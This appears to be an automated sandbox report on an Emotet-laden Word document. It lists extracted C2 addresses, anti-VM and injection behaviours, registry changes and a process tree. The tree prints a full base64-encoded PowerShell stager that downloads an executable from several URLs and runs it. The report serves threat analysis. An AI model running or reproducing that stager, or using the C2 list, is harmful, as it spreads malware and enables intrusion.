Task
task1
Sample
Docs_8284e996aea8e5075256c03a93eaa6df.22.doc
Resource
win7
0 signatures
Task
task2
Sample
Docs_8284e996aea8e5075256c03a93eaa6df.22.doc
Resource
win10
0 signatures
General
-
Target
Docs_8284e996aea8e5075256c03a93eaa6df.22
-
Sample
191011-d4l874b3wn
-
SHA256
9e1d7cd63b0edcb4b3c4b1c86ecf477245ba82b4291bf26484fe2dd6cd9d12a1
Score
N/A
Malware Config
Extracted
Family
emotet
C2
186.75.241.230:80
181.143.194.138:443
181.143.53.227:21
85.104.59.244:20
80.11.163.139:443
167.71.10.37:8080
104.131.44.150:8080
185.187.198.15:80
133.167.80.63:7080
198.199.114.69:8080
144.139.247.220:80
152.89.236.214:8080
78.24.219.147:8080
92.222.216.44:8080
46.105.131.87:80
190.226.44.20:21
182.176.132.213:8090
85.54.169.141:8080
192.81.213.192:8080
101.187.237.217:20
211.63.71.72:8080
5.196.74.210:8080
27.4.80.183:443
27.147.163.188:8080
222.214.218.192:8080
104.236.246.93:8080
91.205.215.66:8080
190.18.146.70:80
80.11.163.139:443
138.201.140.110:8080
190.108.228.48:990
206.189.98.125:8080
178.79.161.166:443
182.76.6.2:8080
115.78.95.230:443
24.45.195.162:7080
173.212.203.26:8080
87.106.139.101:8080
182.176.106.43:995
199.255.156.210:8080
37.157.194.134:443
192.254.173.31:8080
87.106.136.232:8080
190.53.135.159:21
85.106.1.166:50000
200.71.148.138:8080
47.41.213.2:22
149.202.153.252:8080
190.211.207.11:443
62.75.187.192:8080
24.45.195.162:8443
212.71.234.16:8080
189.209.217.49:80
201.251.43.69:8080
45.33.49.124:443
86.98.25.30:53
95.128.43.213:8080
136.243.177.26:8080
159.65.25.128:8080
185.94.252.13:443
31.172.240.91:8080
92.233.128.13:143
41.220.119.246:80
31.12.67.62:7080
201.184.105.242:443
190.145.67.134:8090
181.31.213.158:8080
80.11.163.139:21
59.103.164.174:80
124.240.198.66:80
104.131.11.150:8080
190.106.97.230:443
94.192.225.46:80
67.225.229.55:8080
190.228.72.244:53
94.205.247.10:80
169.239.182.217:8080
217.160.182.191:8080
87.230.19.21:8080
rsa_pubkey.plain
Signatures
-
Suspicious behavior: AddClipboardFormatListener
-
Suspicious use of SetWindowsHookEx
-
Processes:
WINWORD.EXEat description ioc Process 70625 File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm WINWORD.EXE 70735 File created C:\Users\Admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm WINWORD.EXE 91485 File opened for modification C:\Users\Admin\AppData\Local\Temp\Docs_8284e996aea8e5075256c03a93eaa6df.22.doc WINWORD.EXE 91625 File created C:\Users\Admin\AppData\Local\Temp\~$cs_8284e996aea8e5075256c03a93eaa6df.22.doc WINWORD.EXE -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
SppExtComObj.exepowershell.exe877.exeat description Process procid_target 77500 PID 3628 wrote to memory of 2984 SppExtComObj.exe 42 143516 PID 2564 wrote to memory of 1704 powershell.exe 48 144485 PID 1704 wrote to memory of 2992 877.exe 49 -
Checks system information in the registry (likely anti-VM) 2 TTPs 2 IoCs
Processes:
WINWORD.EXEat description ioc Process 91438 Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer WINWORD.EXE 91438 Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName WINWORD.EXE -
Enumerates system info in registry 2 TTPs 5 IoCs
Processes:
WINWORD.EXEat description ioc Process 91438 Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE 91438 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE 91438 Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE 91438 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE 91438 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Checks processor information in registry (likely anti-VM) 2 TTPs 2 IoCs
Processes:
WINWORD.EXEat description ioc Process 91438 Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE 91438 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exeat description Process 128172 Token: SeDebugPrivilege powershell.exe -
Suspicious behavior: EnumeratesProcesses
-
Modifies registry class 1 TTPs 44 IoCs
Processes:
877.exe877.exeat description ioc Process 144360 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1 877.exe 144360 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\ = "Recalc Document" 877.exe 144360 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\DefaultIcon 877.exe 144360 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\DefaultIcon\ = "C:\\Users\\Admin\\877.exe,0" 877.exe 144360 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\ddeexec 877.exe 144360 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell 877.exe 144360 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open 877.exe 144360 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\ddeexec\ = "[open(\"%1\")]" 877.exe 144360 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\ddeexec 877.exe 144360 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print 877.exe 144360 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\ddeexec\ = "[print(\"%1\")]" 877.exe 144360 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\ddeexec 877.exe 144360 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto 877.exe 144360 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\ddeexec\ = "[printto(\"%1\",\"%2\",\"%3\",\"%4\")]" 877.exe 144360 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\command 877.exe 144360 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\command\ = "C:\\Users\\Admin\\877.exe /dde" 877.exe 144360 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\command 877.exe 144360 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\command\ = "C:\\Users\\Admin\\877.exe /dde" 877.exe 144360 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\command 877.exe 144360 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\command\ = "C:\\Users\\Admin\\877.exe /dde" 877.exe 144360 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.RCL 877.exe 144360 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ = "Recalc.Document.1" 877.exe 144375 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ShellNew 877.exe 144375 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ShellNew\NullFile 877.exe 144719 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1 877.exe 144719 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\ = "Recalc Document" 877.exe 144719 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\DefaultIcon 877.exe 144719 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\DefaultIcon\ = "C:\\Users\\Admin\\877.exe,0" 877.exe 144719 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\ddeexec 877.exe 144719 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\ddeexec\ = "[open(\"%1\")]" 877.exe 144719 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\ddeexec 877.exe 144719 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\ddeexec\ = "[print(\"%1\")]" 877.exe 144719 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\ddeexec 877.exe 144719 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\ddeexec\ = "[printto(\"%1\",\"%2\",\"%3\",\"%4\")]" 877.exe 144719 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\command 877.exe 144719 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\open\command\ = "C:\\Users\\Admin\\877.exe /dde" 877.exe 144719 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\command 877.exe 144719 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\print\command\ = "C:\\Users\\Admin\\877.exe /dde" 877.exe 144719 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\command 877.exe 144719 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Recalc.Document.1\shell\printto\command\ = "C:\\Users\\Admin\\877.exe /dde" 877.exe 144719 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.RCL 877.exe 144719 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ = "Recalc.Document.1" 877.exe 144719 Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ShellNew 877.exe 144719 Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.RCL\ShellNew\NullFile 877.exe -
Processes:
877.exedescription ioc Process Event created Global\E145925EC 877.exe -
Suspicious behavior: EmotetMutantsSpam
-
Drops file in system dir 1 IoCs
Processes:
877.exeat description ioc Process 151172 File renamed C:\Users\Admin\877.exe => C:\Windows\SysWOW64\tabletmspterm.exe 877.exe -
emotet family
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_8284e996aea8e5075256c03a93eaa6df.22.doc" /o ""1⤵
- Drops Office document
- Checks system information in the registry (likely anti-VM)
- Enumerates system info in registry
- Checks processor information in registry (likely anti-VM)
PID:3568
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
- Suspicious use of WriteProcessMemory
PID:3628
-
C:\Windows\System32\SLUI.exe"C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent1⤵PID:2984
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiADAAOQAwADUAMAAyADAAYwA5ADAAYwA1AD0AJwBiADgAMQAzADcANgAzADQAMwA5AGMAMABjACcAOwAkAGIAeAAyADQANwAwADQANgAwADUAMgAgAD0AIAAnADgANwA3ACcAOwAkAHgAOQAwADEAeAA0ADMAMQAyADMANQAzAD0AJwB4AGIAYwA5ADEAMgAyADAANAAzAHgAJwA7ACQAYgA0ADgAMAA3ADkAMAA3ADAAYgAxADkAMgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYgB4ADIANAA3ADAANAA2ADAANQAyACsAJwAuAGUAeABlACcAOwAkAHgAMwBjAGIAMAA0ADIAOQA1ADcANgA4AD0AJwBjAHgAMQB4AHgAeAB4ADYAYgA4ADUAJwA7ACQAYwA0ADQAMgA5ADAAMgAwADIAeAB4ADAANAA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAAbgBFAFQALgB3AEUAYgBDAGwAaQBFAE4AVAA7ACQAYgBjADMAMwAwADEAOAAwAGMAMAA4AD0AJwBoAHQAdABwAHMAOgAvAC8AdABoAGUAcwBpAGwAdgBlAHIAYQBuAHQALgBjAG8AbQAvAHQAZQBzAHQALwBkAHYAcgA5AC8AKgBoAHQAdABwADoALwAvAGYAaQByAHMAdABtAG4AZAAuAGMAbwBtAC8AdwBwAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvADMAawA5ADYAMAAvACoAaAB0AHQAcAA6AC8ALwBjAGkAdAB5AGwAYQBuAGQAZwBvAHYAYQBwAC4AbgBlAHQALwA4AGQAcQBzADUAZgB2AC8ANgBKAC8AKgBoAHQAdABwADoALwAvAGQAZQByAGUAZABpAGEALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBjAGIAYQBzAC8AKgBoAHQAdABwADoALwAvAGYAYQB0AHQAbwByAGkAYQBpAHAAbwBuAHQAaQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AbwAxAHcAaQBFAHEAUABmAE4ALwAnAC4AIgBTAHAAYABsAGkAdAAiACgAJwAqACcAKQA7ACQAeAAzADMANgBjADUAMAAxADAAYgAyADcAPQAnAGIAOQA2ADcAYgAxAHgAMgAwADEAMgAnADsAZgBvAHIAZQBhAGMAaAAoACQAeAAzADcANQAwADAAOAAxADAAMAA1ADcAYwAgAGkAbgAgACQAYgBjADMAMwAwADEAOAAwAGMAMAA4ACkAewB0AHIAeQB7ACQAYwA0ADQAMgA5ADAAMgAwADIAeAB4ADAANAAuACIAZABPAFcAbgBMAGAATwBhAGQAZgBgAEkATABFACIAKAAkAHgAMwA3ADUAMAAwADgAMQAwADAANQA3AGMALAAgACQAYgA0ADgAMAA3ADkAMAA3ADAAYgAxADkAMgApADsAJABiADYAMgA2ADgAMQB4AGMAMwBjAHgANAA9ACcAeABiADAAMAA1AGIAMAA1ADAANgB4ADMANQAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0ACcAKwAnAC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAGIANAA4ADAANwA5ADAANwAwAGIAMQA5ADIAKQAuACIATABlAGAATgBHAHQAaAAiACAALQBnAGUAIAAyADcAOQAxADgAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwB0AEEAYABSAHQAIgAoACQAYgA0ADgAMAA3ADkAMAA3ADAAYgAxADkAMgApADsAJAB4ADIAYgAwADcAOAA3ADcAOAA0ADAAMAA9ACcAYgAxADAAMgAwADEAMAAxADAAMAA2ADAAJwA7AGIAcgBlAGEAawA7ACQAYgAyADAAOAAyADAAeAAwADIAYwAzADMANQA9ACcAeAAxAHgAMQAxAHgAMAA0AGMANQA4ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGIAYwA1ADkAMAAwAGIAMwA4ADEAOAAyADcAPQAnAGMAMAA3ADkAOAAwADkAOQA2ADgANgA4ADkAJwA=1⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
PID:2564
-
C:\Users\Admin\877.exe"C:\Users\Admin\877.exe"1⤵
- Suspicious use of WriteProcessMemory
- Modifies registry class
PID:1704
-
C:\Users\Admin\877.exe--406b05561⤵
- Modifies registry class
- Emotet Sync
- Drops file in system dir
PID:2992